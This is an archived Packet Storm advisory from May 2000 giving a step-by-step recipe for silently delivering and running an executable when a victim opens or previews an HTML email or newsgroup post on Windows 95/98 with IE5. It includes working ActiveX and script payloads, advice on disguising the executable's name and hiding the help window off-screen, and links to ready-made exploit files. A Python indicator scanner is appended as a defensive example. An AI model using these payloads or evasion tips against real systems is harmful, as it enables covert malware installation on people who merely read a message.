silent.delivery.txt

Published: 14 May 2000 00:00:00
Reported by: Packet Storm
Type: packetstorm
Source: packetstormsecurity.com

Silent installation of executable via email exploits Windows 95 and 98 security flaws.

Code
```text
Saturday, May 13, 2000

MICROSOFT SECURITY FLAW?

Silent delivery and installation of an executable on a target computer. No
client input other than opening an email or newsgroup post.

1. Using the following this can be accomplished with the default
installation of Windows 95 and 98 and Internet Explorer 5 browsers and
accompanying mail/news clients

2. The key component from Georgi Guninski

http://www.nat.bg/~joro/wordpad-desc.html

3. Secondary component comprises a pre-installed ActiveX control directly
from Microsoft. This control and a variety of similar demonstrations have
been shown to Microsoft over 18 months ago

What to do:

A

(a) Manufacture a *.chm file. The following kit from Microsoft is free and
very easy to use Microsoft® HTML Help:

http://msdn.microsoft.com/library/tools/htmlhelp/wkshp/download.htm

(b) Construct a new *.chm file inputting the ActiveX link control as
follows:

<OBJECT id=AA classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
width=100 height=100>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",C:\WINDOWS\TEMP\MALWARE.exe,">
<PARAM name="Item2" value="273,1,1">
</OBJECT>

<SCRIPT>

AA.Click();
</SCRIPT>

(c) The control itself is quite sensitive to manipulation; the above
represents the bare minimum to run.

(d) Input the path of the executable you intend to run as in PARAM
name="Item1" above. In order to disguise the running of the executable it is
suggested not to give it a silly name, rather something that is familiar
to the operating system e.g. microsoftagent.exe etc.

(e) While constructing the *.chm, it is possible to both minimise and offset
the location of the *.chm file once opened. For example while under
construction you can set the size of the help window and its location -
using the auto resizer in Microsoft® HTML Help, drag the sizer to the
smallest possible size. Although setting the size requires clicking OK
inside the autosizer, dragging to minimal size and hitting ENTER will
register the setting. Secondly offset the location of the file by inputting
say 2000, 2000; this should suffice in it opening off-screen on any size
monitor.

(f) Once you have compiled the *.chm test its functionality by placing the
executable in your temp file and open the *.chm - it should run the
executable.

Now how do we place this on the target computer?

B.

(a) Simply by opening an email message or newsgroup post. The client does
nothing. They receive an email, open it or read a newsgroup post and that is
all. Both the *.exe and *.chm are transferred silently and immediately to
the temp folder once the email or newsgroup post is open.

How so?

(b) It is possible to embed almost anything in both html email and html
news. Current versions of Outlook Express 5 inspect whether what is being
embedded is in fact the correct file, e.g. <img src="abc.doc"> will not
embed because a *.doc is obviously not an image file. Internet Explorer 4
and accompanying Outlook Express 4 do allow for this; similarly Netscape
Messenger also allows for this. Nevertheless, through proprietary JavaScript
and VBscript, it is possible to deliver an intact file to the target
computer's temp folder, however with a file name given by the computer e.g.
000321.doc. This does not serve the purpose of running the *.chm with the
file name explicit as above.

(c) The Microsoft Active Movie Control (AMC) pre-registered and
pre-installed on all Internet Explorer 5 computers does. The very simple
scripting to do this is as follows:

<OBJECT classid=clsid:05589FA1-C356-11CE-BF01-00AA0055595A height=1
style="DISPLAY: none" width=1>

<PARAM NAME="Filename" VALUE="C:\WINDOWS\DESKTOP\MALWARE.chm">

<OBJECT classid=clsid:05589FA1-C356-11CE-BF01-00AA0055595A height=1
style="DISPLAY: none" width=1>

<PARAM NAME="Filename" VALUE="C:\WINDOWS\DESKTOP\MALWARE.exe">

(d) This control too is very sensitive and the complete path must be
inserted in order for it to embed in the html email message or html news
post.

(e) Finally, in the body of the html email or html news post the following
simple JavaScript is required to set off everything:

<SCRIPT>

setTimeout('window.showHelp("c:/windows/temp/MALWARE.chm");',15000);

</SCRIPT>

Sufficient delay must be allowed for the news post or email message and
transference of both the executable and *.chm files to be delivered to the
target computer's temp file before execution is called.

What will happen?

When the email or news post is opened, the embedded *.chm and *.exe will
automatically and silently be transferred to the client temp folder, intact
and with the given names. Default locations on all machines call for the
temp folder to be at C:\windows\temp. The AMC control will deposit the two
files to wherever the temp folder is located; if you have changed the
location, these two files will still be delivered there, however because the
*.chm file is constructed to seek out the *.exe in the default location, it
will fail. Likewise so will the script in the html email message or news
post. Hence, this will only work on default OS installs.

Once the news post or email has been opened or even previewed via Outlook or
Outlook Express preview pane, the two files are delivered to the temp
folder; sufficient time elapses, then the script in the html message calls
the *.chm which opens silently and minimised in the task bar (because we
have instructed it to open at the minimum size and off-set 2000, 2000); once
opened, the ActiveX link control in it runs the executable.

Everything is instantaneous, no need for a reboot and no need for user
interaction other than opening the email (or simply previewing it) or the
newsgroup post. Needless to say once the executable is running, the damage
is done. And no Windows Scripting Host (WSH) involved.

The only solution is to relocate the temp folder and/or set scripting and
ActiveX controls to the highest possible settings. The default settings do
not ask for permission.

Below represents a working example. The executable incorporated is a
harmless joke program. In order to run it, save the entire example as either
*.nws or *.eml and click on it:

note: 1/ on high speed machines and i-connections with IE5, clicking the
links below will allow for viewing of these news and mail files in the
browser (technically known as mhtml), with the same effect. Slower machines
and i-connections might want to save to disk and open from there.
Additionally saving to disk and opening will allow for viewing in the mail
or news client.

note: 2/ it is not necessary to run this through html mail or news; applying
all the above directly on the web results in the same.

Right-click and save to desktop

Mail: http://members.xoom.com/malware/help.eml 89KB

News: http://members.xoom.com/malware/help.nws 89KB
```
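A defender-side check for the indicators the advisory names in an HTML mail body or CHM topic page: the Active Movie Control and HTML Help control CLSIDs, a `ShortCut` command, and a `showHelp()` call. This is an added example, not part of the Packet Storm post; the names and the sample body are constructed, and it relies only on the Python standard library.

```python
import re
from html.parser import HTMLParser
# CLSIDs quoted in the advisory: HTML Help ActiveX control and Active Movie Control
HHCTRL = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
AMC = "05589fa1-c356-11ce-bf01-00aa0055595a"
SHOWHELP = re.compile(r"\bshowHelp\s*\(", re.I)

class IndicatorScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self.open_objects, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lower-cases attribute names
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "")
            self.open_objects.append((clsid, {}))  # one record per OBJECT, nested or not
        elif tag == "param" and self.open_objects:
            self.open_objects[-1][1][a.get("name", "").lower()] = a.get("value", "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "object" and self.open_objects:
            self.judge(*self.open_objects.pop())
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and SHOWHELP.search(data):
            self.findings.append("script: window.showHelp() call")

    def judge(self, clsid, params):
        if clsid == HHCTRL and params.get("command", "").lower() == "shortcut":
            self.findings.append("hhctrl: ShortCut launches " + params.get("item1", ""))
        elif clsid == AMC and params.get("filename", "").lower().endswith((".chm", ".exe")):
            self.findings.append("amc: embeds " + params["filename"])

def scan_html(body):
    s = IndicatorScanner()
    s.feed(body)
    s.close()
    while s.open_objects:  # the advisory's AMC snippet never closes its OBJECT tags
        s.judge(*s.open_objects.pop())
    return s.findings

# Constructed sample body (not the advisory's linked files): a benign image plus two indicators
SAMPLE = ('<img src="logo.gif"><OBJECT classid=clsid:05589FA1-C356-11CE-BF01-00AA0055595A width=1>'
          '<PARAM NAME="Filename" VALUE="C:\\WINDOWS\\DESKTOP\\sample.chm">'
          "<SCRIPT>setTimeout('window.showHelp(\"c:/windows/temp/sample.chm\");',15000);</SCRIPT>")
```

`scan_html(SAMPLE)` reports the embedded `.chm` and the `showHelp()` call; a body with only text and images returns an empty list.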
